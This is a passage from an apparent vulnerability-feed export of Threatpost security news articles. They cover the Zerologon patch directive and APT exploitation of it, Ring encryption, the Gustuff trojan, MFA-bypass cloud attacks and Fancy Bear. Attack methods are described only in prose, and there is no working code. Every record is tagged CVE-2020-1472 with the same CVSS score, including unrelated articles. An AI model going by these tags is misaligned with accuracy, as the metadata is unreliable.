for Netlogon sessions. The AES-CFB8 standard requires that each \u2018byte\u2019 of plaintext have a randomized initialization vector (IV), blocking attackers from guessing passwords. However, Netlogon\u2019s ComputeNetlogonCredential function sets the IV to a fixed 16 bits \u2013 not randomized \u2013 meaning an attacker could control the deciphered text,\u201d according to earlier reporting.\n\nSince the flaw was first identified it has been [under active attack](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>). Calls for immediate patching have been unanimous. However, the Monday deadline for patching by CISA suggests still too many systems have not been updated.\n\n\u201cThis emergency directive remains in effect until all agencies have applied the August 2020 Security Update (or other superseding updates) or the directive is terminated through other appropriate action,\u201d according to CISA.\n\nThe directive is part of the Department of Homeland Security\u2019s_ \u201c[Section 3553(h) of title 44](<https://uscode.house.gov/view.xhtml?req=\\(title:44%20section:3553%20edition:prelim\\)%20OR%20\\(granuleid:USC-prelim-title44-section3553\\)&f=treesort&edition=prelim&num=0&jumpTo=true>)\u201d _U.S. Code of Laws.\n\nThe directive requires security teams at those affected federal civilian and executive branch departments to update all Windows Servers with the domain controller role by midnight EDT Sept. 21. \u201cIf affected domain controllers cannot be updated, ensure they are removed from the network,\u201d the agency said.\n\nNext, agencies must ensure \u201ctechnical and/or management controls are in place to ensure newly provisioned or previously disconnected domain controller servers are updated before connecting to agency networks,\u201d CISA wrote.\n\n\u201cThe availability of the exploit code in the wild increasing likelihood of any upatched domain controller being exploited,\u201d the agency said. It added the widespread presence of the vulnerable domain controllers across the federal enterprise is a concern, coupled with the high potential for agency information systems to be compromised.\n\nThe CISA directive orders those agencies, by 11:59 PM EDT, Wednesday, Sept. 23, 2020, to submit a \u201ccompletion report\u201d to DHS.\n\n\u201cBeginning Oct. 1, 2020, the CISA Director will engage the CIOs and/or Senior Agency Officials for Risk Management of agencies that have not completed required actions, as appropriate and based on a risk-based approach,\u201d read the CISA directive signed by Christopher Krebs, Director, Cybersecurity and Infrastructure Security Agency, within the Department of Homeland Security.\n", "cvss3": {}, "published": "2020-09-21T19:29:21", "type": "threatpost", "title": "DHS Issues Dire Patch Warning for \u2018Zerologon\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T19:29:21", "id": "THREATPOST:F60D403369A535076F39A474F74C925E", "href": "https://threatpost.com/dire-patch-warning-zerologon/159404/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:15", "description": "Smart doorbell maker Ring is giving cybersecurity critics less to gripe about with the introduction of end-to-end encryption to many of its models. Ring products, which have been a juggernaut success with consumers, have faced a litany of harsh criticism from cybersecurity experts for what they say is a [lack of attention to basic digital security](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>).\n\nAfter a much anticipated response to critics, Ring this week rolled out end-to-end encryption for many of its home security camera products. End-to-end encryption, according to Ring, can be added to less than 50 percent of its in-use products. Older model smart-doorbell products, such as its first and second-generation video doorbells, cannot be upgraded with the added protection.\n\nThe move was anticipated, but initiated later than planned. \n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nTechnical specifics by the Amazon-owned company Ring [were made available on Wednesday](<https://assets.ctfassets.net/a3peezndovsu/5jmqFoKyaCXpL2qBG46Zqn/72d138d896e7460c5bdae07992ad491e/Ring_Encryption_Whitepaper.pdf>) (PDF) as part of a technical preview of the new security measures. Ring\u2019s end-to-end encryption plans was first announced in September and originally slated to be introduced by the end of 2020.\n\nThe feature\u2014which will be optional and free for customers\u2014will allow only the device authorized and enrolled with the associated Ring account to accept and access the live Ring video stream. If third parties want to view a recording or stream on another device, they will need access to an encryption key stored on the mobile device authorized to view the stream.\n\nIt\u2019s unclear how [law enforcements\u2019 access to Ring doorbell feeds](<https://threatpost.com/rings-police-partnerships-racial-bias/157140/>) might be impacted \u2013 if at all.\n\n## **Clamoring Critics**\n\nThe company has faced years of criticism for flaws in the system that opened video and data collected by the system to be stolen by threat actors. Still other critics blasted Ring for what they said were the company\u2019s own dodgy data-collection practices.\n\nLast year, Amazon [patched a vulnerability](<https://threatpost.com/senators-amazon-ring-privacy-policies/150533/>) in the Ring smart doorbell that could have allowed attackers to access the owner\u2019s Wi-Fi network credentials and potentially reconfigure the device to launch an attack on the home network.\n\nA couple of days later, five U.S. Senators demanded in a letter to Amazon CEO Jeff Bezos that Amazon disclose how it\u2019s securing Ring home-security device footage\u2013and who is allowed to access that footage.\n\nLast October, Ring raised privacy hackles again when [it unveiled](<https://threatpost.com/ring-drone-privacy/159562/>) the new Always Home Cam, a smart home security camera drone that flies around homes taking security footage of people inside their own homes. Due to Amazon\u2019s already questionable data-collection practices, privacy advocates worried that the footage could fall into the wrong hands.\n\n## **Front Door Mitigations **\n\nOn Wednesday, Ring outlined how it would specifically address those concerns. It said Ring will add an extra layer of security and privacy in addition to Ring\u2019s existing encryption, which by default encrypts videos when they are uploaded to the cloud and stored on Ring\u2019s servers, the company said.\n\n\u201cWith End-to-End Encryption, customer videos are further secured with an additional lock, which can only be unlocked by a key that is stored on the customer\u2019s enrolled mobile device, designed so that only the customer can decrypt and view recordings on their enrolled device,\u201d according to a [Ring blog post](<https://blog.ring.com/2021/01/13/ring-launches-video-end-to-end-encryption/>) about the rollout.\n\nRing said the service gives users \u201ccontrol and additional choices for encrypting and decrypting their videos and is designed so that no unauthorized third party can access user video content,\u201d according to a [whitepaper](<https://threatpost.com/hacks-android-windows-zero-day/163007/>) Ring posted online about the service.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/14080350/Ring_End_to_End_Encryption.jpg>)\n\nRing Diagram of End-to-End Encryption Overview\n\nVideos encrypted when the feature is turned off will still be encrypted if the user decides to disable end-to-end encryption, according to the whitepaper, which also provides step-by-step instructions about how the feature works as well as specific details about what type of encryption the company is using.\n\nEnd-to-end encryption certainly adds a layer of privacy that many customers and privacy advocates have long wanted from Ring, which since its inception has constantly pushed the boundaries of how much privacy people are willing to give up for home security protection.\n\n## **Following Zoom\u2019s Lead**\n\nThe move to add end-to-end encryption to Ring is similar to one that online videoconferencing service [Zoom took last year](<https://threatpost.com/zoom-end-to-end-encryption-paying-users/156286/>) to encrypt video streams amid privacy concerns and numerous security breaches of the service, such as [Zoom bombing](<https://threatpost.com/fbi-threatens-zoom-bombing-trolls-with-jail-time/154495/>) and [zero-day vulnerabilities](<https://threatpost.com/alleged-zoom-zero-days-for-windows-macos-for-sale-report/154846/>), among others. Zoom, however, made the feature available to only paid users of the service.\n\nWhile Ring\u2019s new feature has privacy and security benefits, it also will disrupt some existing features of the service, such as accessing Ring video through Alexa, and Echo Show or Fire TV device, or sharing with other cameras.\n\nThe encryption also may throw a wrench in [controversial plans](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>) to use Ring\u2019s Neighbors app to share data footage from Ring devices with law enforcement, such as what\u2019s happening in [a program being tested by police](<https://threatpost.com/police-livestream-ring-camera-mississippi/160936/>) in Mississippi in which they can livestream video from Ring cameras installed at private homes and businesses. When launched, the program sounded an alarm bell with privacy advocates like the Electronic Frontier Foundation, which [called the launch](<https://www.eff.org/deeplinks/2020/11/police-will-pilot-program-live-stream-amazon-ring-cameras>) of the program its \u201cworst fears\u201d being \u201cconfirmed.\u201d\n\nHowever, as the feature is optional and Ring users can choose to share encryption keys with third parties, it will still be possible to both stream video to other devices and share video streams with law enforcement if the owner of the device so chooses.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-14T13:28:22", "type": "threatpost", "title": "Ring Adds End-to-End Encryption to Quell Security Uproar", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T13:28:22", "id": "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "href": "https://threatpost.com/ring-adds-end-to-end-encryption-to-quell-security-uproar/163042/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T21:59:00", "description": "An Instagram-initiated campaign using the Gustuff Android mobile banking trojan has rolled out in October, featuring an updated version of the malware that lowers its detection profile.\n\nHow the cybercriminals are rolling out the campaign is the same as a previous offensive seen in June, according to researchers at Cisco Talos: Instagram posts designed to lure users into downloading and installing malware are the initial attack vector. Once infected, SMS messages from the device are used to propagate the trojan to others in the victim\u2019s contact lists.\n\nAnd, [just as before](<https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html>), the campaign mainly targets Australian banks and digital currency wallets, looking to steal credentials and financial data.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe application target pool has widened, however: This new version of Gustuff is also looking to harvest user names and passwords for hiring sites\u2019 mobile apps, and interestingly, credentials used on the official Australian government\u2019s web portal, according to the researchers.\n\n\u201cDuring our investigation, we received a command from the [command-and-control server] C2 to target the Australian Government Portal that hosts several public services, such as taxes and social security,\u201d according to [an analysis](<https://blog.talosintelligence.com/2019/10/gustuffv2.html>) posted on Monday. \u201cThe command was issued before the local injections were loaded (using the changearchive command). The injections were loaded from one of the C2 infrastructure servers. This command is not part of the standard activation cycle and\u2026this represents a change for the actor.\u201d\n\nFrom a technical perspective, Cisco Talos researchers said that the malware is still deployed using the same packer that has been seen in previous campaigns, but many other aspects of the latest version of Gustuff have seen significant changes.\n\nOne of the main functionality evolutions is the fact that it no longer contains hardcoded lists of things to look for. Ditching hardcoded names \u201cdramatically lowers the static footprint\u201d that can be used by white hats for analysis, the researchers noted.\n\nFor instance, the applications targeted by the malware are no longer hardcoded in the sample, but are rather provided to the malware during the activation cycle using the command \u201ccheckApps,\u201d according to the analysis. Similarly, the list of antivirus and antimalware software that Gustuff blocks as a self-defense mechanism is now also loaded on the fly during the activation cycle.\n\nAnother notable change is the addition of a scripting engine, initiated via a new command called \u201cscript.\u201d Once issued, the command causes the malware to start a WebChromeClient with JavaScript enabled. Afterward, it adds a JavaScript interface to the WebView feature, which allows mobile apps for Android to display content from the web within their interfaces.\n\n\u201cBy default, the WebView object already has access to the filesystem, which\u2026allows the operator to perform all kinds of scripts to automate its tasks, especially when the script also has access to commands from the application,\u201d according to Cisco Talos. \u201cThe addition of a \u2018poor man scripting engine\u2019 based on JavaScript provides the operator with the ability to execute scripts while using its own internal commands backed by the power of JavaScript language. This is something that is very innovative in the Android malware space.\u201d\n\nAnother change is that another new command, \u201cinteractive,\u201d uses the accessibility API to allow the malware to interact with banking applications. The accessibility API is also in use elsewhere: The malware no longer shows a panel for the user to provide their credit-card information.\n\n\u201cInstead, it will wait for the user to do it [in a monitored app] and \u2014 leveraging the Android Accessibility API \u2014 will harvest it,\u201d the researchers noted. \u201cThis method of luring the victim to give up their credit card information is less obvious, increasing the chances of success, even if it takes longer.\u201d\n\nAnd finally, the C2 issues each command with a unique ID now, which is then used by Gustuff to report on the command execution state.\n\n\u201cThis allows the malicious actor to know exactly in which state the execution is, while before, it would only know if the command was received and its result,\u201d according to the analysis. \u201cThe malware operator can now issue asynchronous commands that will receive feedback on its execution while performing other tasks \u2014 \u2018uploadAllPhotos\u2019 and \u2018uploadFile\u2019 commands are two of such commands.\u201d\n\nOverall, the malware code has evolved to have a lower detection footprint, and, based on the apps list and code changes, it is \u201csafe to assume that the actor behind it is looking for other uses of the malware,\u201d Cisco Talos researchers warned.\n\n_**What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)_**, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d **_[_**Click here to register**_](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-21T20:41:44", "type": "threatpost", "title": "Gustuff Android Banker Switches Up Technical Approach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2019-10-21T20:41:44", "id": "THREATPOST:1322630273A25CA5A68246679553E2B8", "href": "https://threatpost.com/gustuff-android-banker-switches-technical-approach/149403/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:55:38", "description": "The Feds are warning that cybercriminals are bypassing multi-factor authentication (MFA) and successfully attacking cloud services at various U.S. organizations.\n\nAccording to an alert issued Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), there have been \u201cseveral recent successful cyberattacks\u201d focused on compromising the cloud. Most of the attacks are opportunistic, taking advantage of poor cloud cyber-hygiene and misconfigurations, according to the agency.\n\n\u201cThese types of attacks frequently occurred when victim organizations\u2019 employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services,\u201d the alert outlined. \u201cDespite the use of security tools, affected organizations typically had weak cyber-hygiene practices that allowed threat actors to conduct successful attacks.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nFor instance, in one case, an organization did not require a virtual private network (VPN) for remote employees accessing the corporate network.\n\n\u201cAlthough their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it\u2014leaving the organization\u2019s network vulnerable [to brute-forcing],\u201d CISA explained.\n\nThe agency also noted that phishing and possibly a \u201cpass-the-cookie\u201d attack have been the primary attack vectors for the cloud attacks.\n\n## **Phishing and Bypassing MFA**\n\nOn the phishing front, targets are being sent emails containing malicious links, which purport to take users to a \u201csecure message.\u201d Other emails masquerade as alerts for legitimate file hosting services. In both cases, the links take targets to a phishing page, where they\u2019re asked to provide account credentials. The cybercriminals thus harvest these and use them to log into cloud services.\n\n\u201cCISA observed the actors\u2019 logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location),\u201d according to the alert. \u201cThe actors then sent emails from the user\u2019s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization\u2019s file-hosting service.\u201d\n\nMeanwhile, attackers have been able to bypass MFA using a [\u201cpass-the-cookie\u201d attack](<https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/>). Browser cookies are used to store user authentication information so a website can keep a user signed in. The authentication information is stored in a cookie after the MFA test is satisfied, so the user isn\u2019t prompted for an MFA check again.\n\nThus, if attackers extract the right browser cookies they can authenticate as a targeted user in a separate browser session, bypassing all MFA checkpoints. As explained in a recent posting from Stealthbits, an attacker would need to convince a user to click on a phishing email or otherwise compromise a user\u2019s system, after which it\u2019s possible to execute code on the machine. A simple command would allow an attacker to extract the appropriate cookie.\n\n\u201cIt is important to note that not understanding the weaknesses and potential hacking bypasses of MFA is almost as bad as not using it,\u201d said Roger Grimes, data-driven defense evangelist at KnowBe4, via email. \u201cIf you think you\u2019re far less likely to be hacked because of MFA (and that isn\u2019t true), then you are more likely to let your defenses down. But if you understand how MFA can be attacked, and share that with the end users of the MFA and designers of the systems that it relies on, you\u2019re more likely to get a better, less risky outcome. The key is to realize that everything can be hacked. MFA doesn\u2019t impart some special, magical defense that no hacker can penetrate. Instead, strong security awareness training around any MFA solution is crucial, because to do otherwise is to be unprepared and more at risk.\u201d\n\n## **Exploiting Forwarding Rules**\n\nCISA said that it has also observed threat actors, post-initial compromise, collecting sensitive information by taking advantage of email forwarding rules.\n\nForwarding rules allow users to send work emails to their personal email accounts \u2013 a useful feature for remote workers.\n\nCISA said that it has observed threat actors modifying an existing email rule on a user\u2019s account to redirect the emails to attacker-controlled accounts.\n\n\u201cThreat actors also modified existing rules to search users\u2019 email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors\u2019 account,\u201d according to the agency. \u201cThe threat actors [also] created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users\u2019 RSS Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.\u201d\n\n## **Cloud Security**\n\nCloud adoption, spurred by pandemic work realities, will only [accelerate in the year ahead](<https://threatpost.com/2021-cybersecurity-trends/162629/>) with software-as-a-service, cloud-hosted processes and storage driving the charge. A study by Rebyc found that 35 percent of companies surveyed said they plan to accelerate workload migration to the cloud in 2021.\n\nBudget allocations to cloud security will double as companies look to protect cloud buildouts in the year ahead, according to Gartner.\n\n\u201c[Companies] by shifting the responsibility and work of running hardware and software infrastructure to cloud providers, leveraging the economics of cloud elasticity, benefiting from the pace of innovation in sync with public cloud providers, and more,\u201d said David Smith, distinguished VP Analyst at Gartner.\n\nAccordingly, cloud applications and environments are increasingly[ in the sights of attackers](<https://threatpost.com/cloud-king-software-security-trends-2021/162442/>). In December for instance, the National Security Agency issued a warning that threat actors have developed techniques to leverage vulnerabilities in on-premises network access to [compromise the cloud](<https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF>).\n\n\u201cMalicious cyber-actors are abusing trust in federated authentication environments to access protected data,\u201d the advisory read. \u201cThe exploitation occurs after the actors have gained initial access to a victim\u2019s on-premises network. The actors leverage privileged access in the on-premises environment to subvert the mechanisms that the organization uses to grant access to cloud and on-premises resources and/or to compromise administrator credentials with the ability to manage cloud resources.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n\n_ _\n", "cvss3": {}, "published": "2021-01-14T16:45:04", "type": "threatpost", "title": "Cloud Attacks Are Bypassing MFA, Feds Warn", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T16:45:04", "id": "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "href": "https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-19T15:10:38", "description": "China-backed APT Cicada joins the list of threat actors leveraging the [Microsoft Zerologon](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) bug to stage attacks against their targets. In this case, victims are large and well-known Japanese organizations and their subsidiaries, including locations in the United States.\n\nResearchers observed a \u201clarge-scale attack campaign targeting multiple Japanese companies\u201d across 17 regions and various industry sectors that engaged in a range of malicious activity, such as credential theft, data exfiltration and network reconnaissance. Attackers also installed the [QuasarRAT](<https://threatpost.com/microsoft-word-resume-phish-malware/147733/>) open-source backdoor and novel Backdoor.Hartip tool to continue surveillance on victims\u2019 systems, according a recent report.\n\nDue to some notable hallmark activity, the attacks appear to be the work of Cicada (aka APT10, Stone Panda, Cloud Hopper), a state-sponsored threat group which has links to the Chinese government, researchers at Broadcom\u2019s Symantec said. \n[](<https://threatpost.com/newsletter-sign/>) \n\u201cThis campaign has been ongoing since at least mid-October 2019, right up to the beginning of October 2020, with the attack group active on the networks of some of its victims for close to a year,\u201d researchers wrote in a [report](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage>) posted online. \u201cThe campaign is very wide-ranging, with victims in a large number of regions worldwide.\u201d\n\nA number of threat patterns and techniques observed in the campaign that link the activity to Cicada, including a third-stage DLL with an export named \u201cF**kYouAnti;\u201d a third-stage DLL using CppHostCLR technique to inject and execute the .NET loader assembly; .NET Loader obfuscation using ConfuserEx v1.0.0; and the delivery of QuasarRAT as the final payload.\n\nResearchers observed attackers leveraging Zerologon, or [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>), a Microsoft zero-day elevation-of-privilege vulnerability first disclosed and [patched on Aug. 11](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>). The flaw\u2014which stems from the Netlogon Remote Protocol available on Windows domain controllers\u2013allows attackers to spoof a domain controller account and then use it to steal domain credentials, take over the domain and completely compromise all Active Directory identity services.\n\n\u201cAmong machines compromised during this attack campaign were domain controllers and file servers, and there was evidence of files being exfiltrated from some of the compromised machines,\u201d researchers observed.\n\nZerologon has been a thorn in the side of Microsoft for some time, with multiple APTs and other attackers [taking advantage](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) of unpatched systems. Last month [Microsoft warned](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) that the Iranian group MERCURY APT has been actively exploiting the flaw, while the Ryuk ransomware gang used it to [deliver a lightning-fast attack](<e%20group%20was%20able%20to%20move%20from%20initial%20phish%20to%20full%20domain-wide%20encryption%20in%20just%20five%20hours>) that moved from initial phish to full domain-wide encryption in just five hours.\n\nGiven the length of the campaign discovered, Cicada may well be one of the earliest APT groups to take advantage of Zerologon. The group is known for attacking targets in Japan as well as MSPs with living-off-the-land tools and custom malware. In the latter category, the latest campaign uses Backdoor.Hartip, which researchers said is a brand new tool for the group.\n\nIn addition to Zerologon, attackers also extensively used DLL side-loading in the campaign, a common tactic of APT groups that \u201coccurs when attackers are able to replace a legitimate library with a malicious one, allowing them to load malware into legitimate processes,\u201d researchers said. In fact, suspicious activity surrounding DLL side-loading is what tipped Symantec researchers off to campaign when it triggered an alert in Symantec\u2019s Cloud Analytics tool, they said.\n\n\u201cAttackers use DLL side-loading to try and hide their activity by making it look legitimate, and it also helps them avoid detection by security software,\u201d according to the report.\n\nOther tools attackers leveraged in the campaign included: [RAR archiving](<https://attack.mitre.org/techniques/T1560/>), which can transfer files to staging servers before exfiltration; [WMIExec](<https://attack.mitre.org/techniques/T1047/>), used for lateral movement and to execute commands remotely; Certutil, a command-line utility that can be exploited to decode information, download files and install browser root certificates; and PowerShell, an environment in the Windows OS that\u2019s often abused by threat actors. The campaign also used legitimate cloud file-hosting service for exfiltration, researchers said.\n", "cvss3": {}, "published": "2020-11-19T14:34:36", "type": "threatpost", "title": "APT Exploits Microsoft Zerologon Bug: Targets Japanese Companies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-19T14:34:36", "id": "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "href": "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:57:05", "description": "At least 16 anti-doping authorities and sporting organizations around the world have been hit by cyberattacks as the world begins to gear up for the Tokyo Summer Olympic Games, which kick off July 2020.\n\nThe attacks, which began Sept. 16, have been linked to infamous Russian threat group [Fancy Bear](<https://threatpost.com/tag/fancy-bear/>) (also known as APT28, Strontium and Sofacy), according to a Monday alert by Microsoft Threat Intelligence Center. Microsoft did not specify the names of targeted companies. The company said that some of these attacks were successful, but the majority were not.\n\n\u201cThe methods used in the most recent attacks are similar to those routinely used by Strontium to target governments, militaries, think tanks, law firms, human rights organizations, financial firms and universities around the world,\u201d said Tom Burt, corporate vice president, customer security and trust at Microsoft, [in a Monday post](<https://blogs.microsoft.com/on-the-issues/2019/10/28/cyberattacks-sporting-anti-doping/>). \u201cStrontium\u2019s methods include spearphishing, password spray, exploiting internet-connected devices and the use of both open-source and custom malware.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn addition to their timing before the [2020 Summer Olympic Games](<https://www.olympic.org/tokyo-2020>) in Tokyo, the attacks also coincide with the World Anti-Doping Agency\u2019s (WADA) [reported](<https://www.bbc.com/sport/athletics/49805296>) warning in September that Russia could face a ban from all major sports events over \u201cdiscrepancies\u201d in a lab database.\n\nA WADA spokesperson told Threatpost that there is no evidence of any breach on WADA\u2019s systems.\n\n\u201cWADA takes the issue of cyber-security extremely seriously,\u201d the WADA spokesperson told Threatpost. \u201cAs a matter of course, the Agency closely and continually monitors all its systems, regularly updating and strengthening its defenses \u2013 both in terms of technological advancements and by ensuring our users are aware of and properly educated regarding security.\u201d\n\nFancy Bear has [previously targeted](<https://www.nytimes.com/2018/01/10/sports/olympics/russian-hackers-emails-doping.html>) anti-doping and sporting organizations, in 2016 and 2018 hacking various organizations, including the World Anti-Doping Agency (WADA). The APT accessed its database and released medical records and emails for U.S. Olympic gymnastics phenom Simone Biles as well as tennis stars Serena Williams and Rafael Nadal.\n\nThese previous attacks led to the [U.S. charging members](<https://www.justice.gov/opa/pr/us-charges-russian-gru-officers-international-hacking-and-related-influence-and>) of the Fancy Bear team with computer hacking, wire fraud, aggravated identity theft and money laundering in 2018.\n\nFancy Bear has been [linked to Russia](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) by the U.S. government, which attributed election-season hacking during the 2016 presidential election to the group. The APT has also been linked to hacking and disinformation attacks during the [French](<https://www.theguardian.com/world/2017/may/08/macron-hackers-linked-to-russian-affiliated-group-behind-us-attack>) and [German](<https://www.zeit.de/digital/2017-05/cyberattack-bundestag-angela-merkel-fancy-bear-hacker-russia/seite-6>) presidential elections in 2017; hacking Republican think-tanks and spreading fake social media sites leading up to the [U.S. midterm elections](<https://www.forbes.com/sites/kateoflahertyuk/2018/08/23/midterm-election-hacking-who-is-fancy-bear/#4519c3192325>) in 2018; and a range of other espionage and influence campaigns related to sowing chaos and discord into democratic processes.\n\nMost recently, in [February, Microsoft warned](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>) that APT28 was amping up their efforts to target journalists, think-tanks, non-governmental organizations and other members of civil society before the May elections for European Parliament.\n\nCoincidentally, [just this past week](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>) cybercriminals posing as Fancy Bear were spotted launching DDoS attacks against companies in the financial sector and demanding ransom payments.\n\nMicrosoft\u2019s Burt recommends that anti-doping and sporting organization employees enable two-factor authentication on all business and personal email accounts, learn how to detect phishing schemes and enable security alerts about links and files from suspicious websites.\n\n\u201cAs we\u2019ve said in the past, we believe it\u2019s important to share significant threat activity like that we\u2019re announcing today,\u201d said Burt. \u201cWe think it\u2019s critical that governments and the private sector are increasingly transparent about nation-state activity so we can all continue the global dialogue about protecting the internet. We also hope publishing this information helps raise awareness among organizations and individuals about steps they can take to protect themselves.\u201d\n\n**_Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. [Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**\n", "cvss3": {}, "published": "2019-10-29T14:57:44", "type": "threatpost", "title": "Fancy Bear Targets Sporting, Anti-Doping Orgs As 2020 Olympics Loom", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2019-10-29T14:57:44", "id": "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "href": "https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:56:58", "description": "A new version of the Adwind remote access trojan (RAT) has been discovered taking aim at new targets.\n\nAdwind (a.k.a. JRAT or SockRat) is a Java-based remote access trojan that sniffs out data \u2013 mainly login credentials \u2013 from victims\u2019 machines. While Adwind has historically been platform-agnostic, researchers say they have discovered a new four-month-old version targeting specifically Windows applications \u2013 like Explorer and Outlook \u2013 as well as Chromium-based browsers (Chromium is a free and open-source web browser developed by Google), including newer browsers like Brave.\n\nThe swap up in targeting \u201cshows that attackers are closely keeping track of newly released applications that are gaining traction amongst end users and adapt their RAT functionality to steal information from these new applications,\u201d Krishnan Subramanian, security researcher at Menlo Labs, told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe new variant is a JAR file (Java ARchive; a package file format typically used to aggregate many Java class files) that researchers say is typically delivered from a link in a phishing email or downloaded from a legitimate site serving up insecure third-party content.\n\nResearchers said they have also observed many infections originating from outdated WordPress sites, which is \u201cgrowing in popularity due to the vulnerabilities in the publishing platform.\u201d\n\n\u201cGoing by the uptick in the number of wordpress vulnerabilities being exploited in the wild, we believe that the initial JAR file was served from compromised WordPress servers,\u201d Subramanian told Threatpost.\n\n## Attack Vector\n\nOnce delivered, this new Adwind variant obfuscates the initial JAR file, blocking against any signature-based detection methods.\n\n\u201cMalware that takes advantage of 